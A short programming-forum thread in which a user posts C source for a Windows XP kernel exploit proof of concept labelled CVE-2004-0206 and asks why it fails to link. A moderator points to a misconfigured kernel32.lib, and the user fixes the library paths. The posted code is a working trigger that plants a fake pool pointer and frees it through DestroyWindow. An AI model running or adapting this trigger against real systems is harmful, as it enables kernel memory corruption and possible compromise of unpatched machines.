NO

Author Topic: Not quite beginner not quite expert - win32 api compile issue  (Read 2466 times)

xxdb999

  • Guest
Here is the code: I'm trying to compile an exploit for penetration testing for a windows xp virtual machine in my lab.

I've tried various different iterations and various different versions of the libraries but I'm afraid I must be missing something because I just can't get it to compile.

Please take a look and see if there's anything obvious that I'm missing. Thank you very much in advance for any hints.

#include <windows.h>


int main(void)
{
    WNDCLASSA Class = {0};
    CREATESTRUCTA Cs = {0};
    FARPROC MenuWindowProcA;
    HMODULE hModule;
    HWND hWindow;
 
    Class.lpfnWndProc = DefWindowProc;
    Class.lpszClassName = "Class";
    Class.cbWndExtra = sizeof(PVOID);
 
    RegisterClassA(&Class);
 
    hModule = LoadLibraryA("USER32.DLL");
 
    MenuWindowProcA = GetProcAddress(hModule,"MenuWindowProcA");
 
    hWindow = CreateWindowA("Class","Window",0,0,0,32,32,NULL,NULL,NULL,NULL);
 
    // set the pointer value of the (soon to be) popup menu structure
    SetWindowLongPtr(hWindow,0,(LONG_PTR)0x80808080);
 
    // set WND->fnid = FNID_MENU
    MenuWindowProcA(hWindow,0,WM_NCCREATE,(WPARAM)0,(LPARAM)&Cs);
 
    // trigger -> ExPoolFree(0x80808080)
    DestroyWindow(hWindow);
 
    return 0;
}

Here is the error I get:
Building cve2004-0206-xp0.obj.
C:\Users\xx\Documents\Pelles C Projects\cve2004-0206-xp0\cve2004-0206-xp0.c(11): warning #2027: Missing prototype for 'MenuWindowProcA', with type 'int __stdcall (*)()'.
C:\Users\xx\Documents\Pelles C Projects\cve2004-0206-xp0\cve2004-0206-xp0.c(19): warning #2216: The return value from 'RegisterClassA' is never used.
C:\Users\xx\Documents\Pelles C Projects\cve2004-0206-xp0\cve2004-0206-xp0.c(28): warning #2216: The return value from 'SetWindowLongA' is never used.
C:\Users\xx\Documents\Pelles C Projects\cve2004-0206-xp0\cve2004-0206-xp0.c(31): warning #2216: The return value from 'function' is never used.
C:\Users\xx\Documents\Pelles C Projects\cve2004-0206-xp0\cve2004-0206-xp0.c(34): warning #2216: The return value from 'DestroyWindow' is never used.
Building cve2004-0206-xp0.exe.
POLINK: error: Unresolved external symbol '__imp__GetEnvironmentStrings@0'.
POLINK: fatal error: 1 unresolved external(s).
*** Error code: 1 ***
Done.

Here are my settings in the linker tab:
Library and object files:
kernel32.lib advapi32.lib delayimp.lib user32.lib

Command line options:
-subsystem:console -machine:x86 kernel32.lib advapi32.lib delayimp.lib user32.lib

Offline TimoVJL

  • Global Moderator
  • Member
  • *****
  • Posts: 2091
Re: Not quite beginner not quite expert - win32 api compile issue
« Reply #1 on: March 13, 2018, 08:19:36 AM »
  • GetEnvironmentStrings() is not in that code example.
  • GetEnvironmentStrings/__imp__GetEnvironmentStrings@0 is in kernel32.lib, so there is something wrong in your development environment.
May the source be with you

xxdb999

  • Guest
Re: Not quite beginner not quite expert - win32 api compile issue
« Reply #2 on: March 14, 2018, 02:11:32 AM »
Thanks. Looks like I had the paths variable missing the .libs from pelles. It was picking up the libs from masm32 instead.
When I added the correct libs it compiled with no problems. Thanks again.